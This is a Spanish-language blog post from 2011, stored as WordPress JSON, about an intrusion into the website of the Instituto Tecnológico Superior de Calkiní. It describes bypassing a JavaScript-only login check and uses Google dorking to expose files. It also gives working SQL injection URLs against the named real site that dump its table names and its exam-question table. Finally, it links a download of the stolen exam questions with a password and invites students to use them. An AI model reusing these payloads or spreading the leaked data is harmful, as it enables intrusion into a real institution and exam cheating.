{"id":1011,"date":"2011-04-01T00:48:17","date_gmt":"2011-04-01T06:48:17","guid":{"rendered":"http:\/\/puchunguis.com\/blog\/?p=1011"},"modified":"2011-04-25T09:21:57","modified_gmt":"2011-04-25T14:21:57","slug":"instituto-tecnologico-superior-de-calkini-itescam-edu-mx-hackeado","status":"publish","type":"post","link":"https:\/\/www.jorgealdana.pro\/blog\/seguridad\/instituto-tecnologico-superior-de-calkini-itescam-edu-mx-hackeado\/","title":{"rendered":"Instituto Tecnol\u00f3gico Superior de Calkin\u00ed (itescam.edu.mx) Hackeado"},"content":{"rendered":"<p><a href=\"https:\/\/484c2a6d15c399b70beb-b1e2a15a3df201703b71bb9b31acda05.ssl.cf5.rackcdn.com\/2011\/04\/itescam.png\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" src=\"https:\/\/484c2a6d15c399b70beb-b1e2a15a3df201703b71bb9b31acda05.ssl.cf5.rackcdn.com\/2011\/04\/itescam-150x150.png\" alt=\"\" title=\"itescam\" width=\"150\" height=\"150\" class=\"alignleft size-thumbnail wp-image-1018\" \/><\/a>Es una realidad que la actualidad tecnol\u00f3gica representa un desaf\u00edo para los presentes y futuros profesionales en el \u00e1rea de sistemas computacionales, pero hasta ahora en Campeche a nadie le preocupa el proceso de formaci\u00f3n de los educandos en materia de <strong>Seguridad Inform\u00e1tica<\/strong>.<\/p>\n<p>A M\u00e9xico y vuelvo a recalcar m\u00e1s a\u00fan <strong>a Campeche le falta mucha educaci\u00f3n sobre seguridad inform\u00e1tica<\/strong>, los usuarios de Internet o \u00abcibern\u00e1utas\u00bb son vulnerables a los hackers dedicados a rastrear los datos en la web y robar la informaci\u00f3n de sus v\u00edctimas predeterminadas o casuales por falta de educaci\u00f3n e ignorancia sobre el tema.<\/p>\n<p>Esto deriva en que los <strong>\u00abfuturos profesionales\u00bb no tengan una preparaci\u00f3n adecuada<\/strong>, y cuando adquieren un trabajo relacionado con su carrera, tienen a cometer errores y estar propensos a las \u00abvulnerabilidades\u00bb por no estar preparados.<\/p>\n<p>En mi opini\u00f3n, creo que <strong>este tipo de educaci\u00f3n se debe impartir al cursar la carrera<\/strong> pero ninguna Universidad se lo toma enserio. Esto no quiere decir que las Universidades sean malas, al contrario el ITESCAM es una de las Universidades m\u00e1s reconocidas en el estado, pero al igual que todas en el estado, se encuentra deficiente en materia de Seguridad Inform\u00e1tica, es probable que los alumnos lleven alguna materia de esta rama, pero dudo que la persona que lo predica tenga algo de experiencia en el tema.<\/p>\n<p>En f\u00edn, hoy expondr\u00e9 un ejemplo, cabe mencionar que lo presentado a continuaci\u00f3n es con fines educativos con el af\u00e1n de mejorar y expandir los conocimientos acerca de la seguridad.<\/p>\n<p>Un hacker denominado \u00abJAG\u00bb <strong>pudo acceder a la base de datos del ITESCAM, al sistema SYLABUS, a la web de docentes y alumnos<\/strong> \u00bfC\u00f3mo lo hizo?<\/p>\n<p>1.- Fallas en verificaci\u00f3n de sesi\u00f3n<br \/>\n2.- SQL Injection<br \/>\n3.- Google Hacking<\/p>\n<h2>Fallas en verificaci\u00f3n de Sesi\u00f3n<\/h2>\n<p>El ITESCAM utiliza un login com\u00fan para poder validad el acceso a secciones del sitio, pero hay una vulnerabilidad que permite el acceso al sistema sin tener que iniciar tu sesi\u00f3n, y es que generalmente en un sistema de validaci\u00f3n utiliza redireccionamientos a trav\u00e9s de headers en el navegador, pero por alguna raz\u00f3n el ITESCAM pens\u00f3 que utilizar javascript para redireccionar era una buena idea.<\/p>\n<p>URL: <a href=\"https:\/\/www.itescam.edu.mx\/principal\/docentes\/\" target=\"_blank\" rel=\"noopener\">https:\/\/www.itescam.edu.mx\/principal\/docentes\/<\/a><\/p>\n<p>Al acceder directamente a la URL anterior el navegador automaticamente es \u00abredirigido\u00bb al login:<\/p>\n<p>Pero si echamos un ojo al c\u00f3digo fuente del sitio web, podemos observar lo siguiente:<\/p>\n<p><a href=\"https:\/\/484c2a6d15c399b70beb-b1e2a15a3df201703b71bb9b31acda05.ssl.cf5.rackcdn.com\/2011\/04\/vul_itescam.jpg\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" class=\"alignnone size-thumbnail wp-image-1012\" title=\"ITESCAM hackeado\" src=\"https:\/\/484c2a6d15c399b70beb-b1e2a15a3df201703b71bb9b31acda05.ssl.cf5.rackcdn.com\/2011\/04\/vul_itescam-150x150.jpg\" alt=\"Vulnerabilidad ITESCAM\" width=\"150\" height=\"150\" \/><\/a><\/p>\n<p>El sitio web redirige por medio de Javascript si no haz iniciado la sesi\u00f3n, \u00bfpero que pasa si desactivo el javascript en mi navegador y vuelvo a entrar a esa p\u00e1gina? sopresa, tienes \u00abGRANT ACCESS PRIVILEGE\u00bb<\/p>\n<p><a href=\"https:\/\/484c2a6d15c399b70beb-b1e2a15a3df201703b71bb9b31acda05.ssl.cf5.rackcdn.com\/2011\/04\/vul_itescam2.jpg\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" class=\"alignnone size-thumbnail wp-image-1014\" title=\"vul_itescam\" src=\"https:\/\/484c2a6d15c399b70beb-b1e2a15a3df201703b71bb9b31acda05.ssl.cf5.rackcdn.com\/2011\/04\/vul_itescam2-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" \/><\/a> <a href=\"https:\/\/484c2a6d15c399b70beb-b1e2a15a3df201703b71bb9b31acda05.ssl.cf5.rackcdn.com\/2011\/04\/vul_itescam1.jpg\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-thumbnail wp-image-1013\" title=\"vul_itescam\" src=\"https:\/\/484c2a6d15c399b70beb-b1e2a15a3df201703b71bb9b31acda05.ssl.cf5.rackcdn.com\/2011\/04\/vul_itescam1-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" \/><\/a><\/p>\n<p>Creo que es obvio que tienes acceso a todas las opciones contenidas en el panel de docente \u00bfno?<\/p>\n<p>Asistencia de Alumnos,Avisos,Convocatorias,Gu\u00edas y Formatos,Calendario y Plazos,Horarios de Clase,Temas para Ex\u00e1menes de T\u00edtulo,Alumnos Asesorados,Syllabus,Control de Asistencias,Consultar Curriculum,Modificaci\u00f3n de Datos Recursos Humanos,Encuestas,Cerrar Sesi\u00f3n<\/p>\n<p>Esto aplica de igual manera para el panel de Alumnos.<\/p>\n<h2>Sistema Syllabus<\/h2>\n<p>El Syllabus es un \u00abSISTEMA VIRTUAL DE APOYO AL APRENDIZAJE\u00bb ser\u00e9 breve, claro y preciso: es una base de conocimiento donde converge toda la informaci\u00f3n educativa de la instituci\u00f3n, documentos, presentaciones etc&#8230;<\/p>\n<p><a href=\"https:\/\/484c2a6d15c399b70beb-b1e2a15a3df201703b71bb9b31acda05.ssl.cf5.rackcdn.com\/2011\/04\/vul_itescam3.jpg\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-thumbnail wp-image-1015\" title=\"vul_itescam\" src=\"https:\/\/484c2a6d15c399b70beb-b1e2a15a3df201703b71bb9b31acda05.ssl.cf5.rackcdn.com\/2011\/04\/vul_itescam3-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" \/><\/a><\/p>\n<p>El problema es que no tienen configurado de manera correcta el apache y si a esto le aumentas el hecho del error en javascript, puedes descargarte todos los cursos de cualquier carrera, basta con curosear o hacer \u00abGoogle Hacking\u00bb<\/p>\n<p><a href=\"http:\/\/www.google.com.mx\/search?hl=es&amp;safe=off&amp;q=site%3Aitescam.edu.mx%2Fprincipal%2Fsylabus%2Ffpdb%2Frecursos&amp;aq=f&amp;aqi=&amp;aql=&amp;oq=\" target=\"_blank\" rel=\"noopener\">http:\/\/www.google.com.mx\/search?hl=es&amp;safe=off&amp;q=site%3Aitescam.edu.mx%2Fprincipal%2Fsylabus%2Ffpdb%2Frecursos&amp;aq=f&amp;aqi=&amp;aql=&amp;oq=<br \/>\n<\/a><\/p>\n<h2>SQL Injection<\/h2>\n<p>Este es otro de los errores pero no el menos importante, ir\u00e9 directamente el grano:<\/p>\n<p><a href=\"http:\/\/www.itescam.edu.mx\/principal\/sylabus\/rptSylabus.php?tipo=PDF&#038;id_asignatura=-278%20union all select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema = database()\/*\" target=\"_blank\" rel=\"noopener\">http:\/\/www.itescam.edu.mx\/principal\/sylabus\/rptSylabus.php?tipo=PDF&#038;id_asignatura=-278%20union all select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema = database()\/*<\/a><\/p>\n<p><a href=\"http:\/\/www.itescam.edu.mx\/principal\/sylabus\/rptSylabus.php?tipo=PDF&amp;id_asignatura=-278%20union%20all%20select%201,REACTIVO,3,4,5,6,7%20from%20REACTIVOS\/*\" target=\"_blank\" rel=\"noopener\">http:\/\/www.itescam.edu.mx\/principal\/sylabus\/rptSylabus.php?tipo=PDF&amp;id_asignatura=-278%20union%20all%20select%201,REACTIVO,3,4,5,6,7%20from%20REACTIVOS\/*<br \/>\n<\/a><\/p>\n<p>De nueva cuenta y gracias a su sistema Syllabus se puede tener acceso a la base de datos de la instituci\u00f3n:<br \/>\nEjemplo:<\/p>\n<ul>\n<li>AREAS<\/li>\n<li>ASIGNATURAS<\/li>\n<li>BIBLIOGRAFIAS<\/li>\n<li>CALENDAR<\/li>\n<li>CAPACITACIONES<\/li>\n<li>COMPETENCIAS<\/li>\n<li>COMUNALES<\/li>\n<li>DOCENTES<\/li>\n<li>EVALUACIONES<\/li>\n<li>EXAMENESGENERADOS<\/li>\n<li>GRUPOS<\/li>\n<li>HISTORIAL_ACCESOS<\/li>\n<li>MATERIAS<\/li>\n<li>METODOLOGIAS<\/li>\n<li>PERIODOS<\/li>\n<li>PLAN_ESTUDIOS<\/li>\n<li>PRERREQUISITOS<\/li>\n<li>REACTIVOS<\/li>\n<li>REACTIVOSEXAMENG<\/li>\n<li>RECURSOS<\/li>\n<li>SUBTEMAS<\/li>\n<li>TEMAS<\/li>\n<li>TEMP_REACTIVOS<\/li>\n<li>UNIDADES<\/li>\n<\/ul>\n<p><a href=\"https:\/\/484c2a6d15c399b70beb-b1e2a15a3df201703b71bb9b31acda05.ssl.cf5.rackcdn.com\/2011\/04\/vul_itescam4.jpg\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/484c2a6d15c399b70beb-b1e2a15a3df201703b71bb9b31acda05.ssl.cf5.rackcdn.com\/2011\/04\/vul_itescam4-150x150.jpg\" alt=\"\" title=\"vul_itescam\" width=\"150\" height=\"150\" class=\"alignnone size-thumbnail wp-image-1016\" \/><\/a><\/p>\n<p>Si deseas descargar la tabla de reactivos para tu pr\u00f3ximo examen lo puedes hacer aqu\u00ed:<\/p>\n<p><a href=\"http:\/\/rapidshare.com\/files\/455369996\/Sylabus.rar\" target=\"_blank\" rel=\"noopener\">http:\/\/rapidshare.com\/files\/455369996\/Sylabus.rar<\/a><\/p>\n<p>Password: blog.puchunguis.com<\/p>\n<p>Espero que alg\u00fan d\u00eda las instituciones le presten atenci\u00f3n a esta materia, ya que el ITESCAM no es el \u00fanico con estas vulnerabilidades, la UAC, el IT Campeche la gran mayor\u00eda de las universidades presentan errores de seguridad en sus servidores o servicios y no creo que todos los Hackers sean tan considerados y probablemente si hay una pr\u00f3xima intrusi\u00f3n se pierda informaci\u00f3n o conviertan los combiertan en servers en Zombies. <\/p>\n<p>Fuente: <a href=\"mailto:jag@anonymbox.com\">Correo an\u00f3nimo: jag@anonymbox.com<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Es una realidad que la actualidad tecnol\u00f3gica representa un desaf\u00edo para los presentes y futuros profesionales en el \u00e1rea de sistemas computacionales, pero hasta ahora en Campeche a nadie le preocupa el proceso de formaci\u00f3n de los educandos en materia de Seguridad Inform\u00e1tica. A M\u00e9xico y vuelvo a recalcar m\u00e1s a\u00fan a Campeche le falta mucha educaci\u00f3n sobre seguridad inform\u00e1tica, los usuarios de Internet o \u00abcibern\u00e1utas\u00bb son vulnerables a los hackers dedicados a rastrear los datos en la web y robar la informaci\u00f3n de sus v\u00edctimas predeterminadas o casuales por falta de educaci\u00f3n e ignorancia sobre el tema. Esto deriva <\/p>\n","protected":false},"author":1,"featured_media":1018,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[14],"tags":[1875,1884,1885,1877,1878,7,1881,1874,1876,1882,1883,1880,1879],"class_list":["post-1011","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-seguridad","tag-hackean-a-itescam","tag-hackean-al-itescam","tag-hackean-itescam","tag-hackearon-a-itescam","tag-hackearon-al-tecnologico-de-calkini","tag-hackers","tag-itescam","tag-itescam-hackeado","tag-itescam-hackers","tag-itescam-edu-mx","tag-itescam-edu-mx-hackeado","tag-tecnologico-de-calkini-campeche","tag-tecnologico-de-calkini-hackeado","has_thumb"],"_links":{"self":[{"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/posts\/1011","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/comments?post=1011"}],"version-history":[{"count":7,"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/posts\/1011\/revisions"}],"predecessor-version":[{"id":1154,"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/posts\/1011\/revisions\/1154"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/media\/1018"}],"wp:attachment":[{"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/media?parent=1011"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/categories?post=1011"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/tags?post=1011"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}